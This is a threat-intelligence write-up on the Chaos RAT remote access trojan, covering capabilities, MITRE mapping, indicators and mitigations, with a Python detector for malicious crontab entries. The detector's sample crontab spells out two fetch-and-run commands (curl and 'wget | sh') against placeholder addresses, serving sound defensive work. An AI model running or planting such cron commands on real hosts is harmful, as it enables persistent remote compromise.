Full Report
Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. "Chaos RAT is an open-source RAT written in
Analysis Summary
# Tool/Technique: Chaos RAT
## Overview
Chaos RAT is an open-source, cross-platform Remote Access Trojan (RAT) written in Golang, used by threat actors for initial access, reconnaissance, and execution on compromised systems. It functions similarly to popular frameworks like Cobalt Strike and Sliver, offering an administrative panel for payload building and session control. Recent variants have been observed targeting Windows and Linux systems, sometimes in conjunction with cryptocurrency mining campaigns.
## Technical Details
- Type: Malware family (RAT)
- Platform: Windows, Linux
- Capabilities: Payload generation, session establishment, remote command execution (reverse shells), file operations (upload/download/delete), system enumeration, screenshot capture, system control (lock/restart/shutdown), arbitrary URL opening.
- First Seen: Development started in 2017; attracted attention in December 2022. Latest version (5.0.3) released May 31, 2024.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols
- TA0002 - Execution
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.004 - Scheduled Task/Job (Observed modifying `/etc/crontab`)
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1566.002 - Spearphishing Link
## Functionality
### Core Capabilities
- Establishment of command and control sessions over external servers.
- Launching reverse shells.
- File system manipulation (upload, download, delete).
- System information gathering and device enumeration.
- Remote system control (shutdown, restart, lock).
### Advanced Features
- Cross-platform compatibility (Windows and Linux) due to Golang implementation.
- Administrative panel for payload construction and management of compromised machines.
- Masquerading as legitimate utilities (e.g., "NetworkAnalyzer.tar.gz" for Linux troubleshooting).
- Potential for secondary payloads, such as XMRig cryptocurrency miners.
## Indicators of Compromise
- File Hashes: (Not provided explicitly in the text)
- File Names: "NetworkAnalyzer.tar.gz"
- Registry Keys: (Not provided)
- Network Indicators: Beacons to an **external server** for commands (the C2 address is not given in the source).
- Behavioral Indicators: Modifies the system crontab **/etc/crontab** so that the malware is re-fetched periodically for persistence.
## Associated Threat Actors
- Attribution is currently unclear; because Chaos RAT is open source, its use in real-world attacks lets APT groups blend into cybercrime noise.
## Detection Methods
- Signature-based detection (if specific threat intelligence signatures exist for known artifacts).
- Behavioral detection: Monitoring for system modifications like changes to `/etc/crontab`.
- YARA rules if available.
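As an added example that is not from the Acronis report or the Chaos RAT project, the following Python checker implements the behavioral detection above: it parses a system crontab in `/etc/crontab` format and flags jobs whose command fetches and runs content from a remote URL. The crontab contents, hostnames and file names are constructed for the example.

```python
import re

# Constructed sample in /etc/crontab format (schedule, user, command). The two
# fetch-and-execute jobs are made up for this example, using RFC 5737 addresses.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    curl -fsSL http://203.0.113.10/NetworkAnalyzer.tar.gz -o /tmp/na.tgz && tar xzf /tmp/na.tgz -C /tmp && /tmp/NetworkAnalyzer
0 3     * * *   root    wget -q -O - http://198.51.100.7/u.sh | sh
30 2    * * 7   backup  /usr/local/bin/backup.sh
"""

# A job is flagged when its command references a remote URL and at least one
# further fetch-and-execute heuristic matches.
REMOTE_URL = re.compile(r"\bhttps?://[^\s'\"]+", re.I)
HEURISTICS = [
    ("download tool", re.compile(r"\b(curl|wget)\b")),
    ("pipes download into a shell", re.compile(r"\|\s*(ba|da)?sh\b")),
    ("runs from a world-writable dir", re.compile(r"(^|[\s&;|])/(tmp|dev/shm|var/tmp)/\S*")),
]

def parse_system_crontab(text):
    """Yield (line_no, user, schedule, command) per job; skip comments, blanks, VAR=value."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):          # @reboot, @daily ... are a single schedule field
            parts = line.split(None, 2)
        else:                             # classic five-field schedule
            parts = line.split(None, 6)
            parts = [" ".join(parts[:5])] + parts[5:]
        if len(parts) == 3:               # anything else is malformed; nothing to evaluate
            schedule, user, command = parts
            yield line_no, user, schedule, command

def find_suspicious_entries(text):
    """Return [(line_no, user, reasons)] for jobs that fetch and run remote content."""
    hits = []
    for line_no, user, _schedule, command in parse_system_crontab(text):
        if not REMOTE_URL.search(command):
            continue
        reasons = [name for name, rx in HEURISTICS if rx.search(command)]
        if reasons:
            hits.append((line_no, user, ["remote URL"] + reasons))
    return hits
```

Calling `find_suspicious_entries(SAMPLE_CRONTAB)` returns the two fetch-and-execute jobs (lines 5 and 6 of the sample) together with the heuristics each one matched; run it over the real `/etc/crontab` (and `/etc/cron.d/*`) on a host to triage cron-based persistence.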
## Mitigation Strategies
- Scrutinize emails containing malicious links or attachments, especially those tricking users into downloading utilities.
- Implement strict controls over scheduling services or file modification permissions for system configuration files like `/etc/crontab`.
- Be wary of open-source tools being weaponized; maintain strong endpoint detection and response (EDR) capabilities.
- Patching/Updating: CVE-2024-30850 (command injection) and CVE-2024-31839 (XSS), both affecting the admin panel, were addressed by the maintainer as of May 2024; anyone running the administrative framework must keep it updated.
## Related Tools/Techniques
- Cobalt Strike (Inspiration for administrative panel/framework design)
- Sliver (Inspiration for administrative panel/framework design)
- Cryptocurrency Miners (XMRig, often deployed post-infection)
- Clipper malware (mentioned in connection with Trust Wallet campaigns, suggesting possible co-deployment or parallel activity).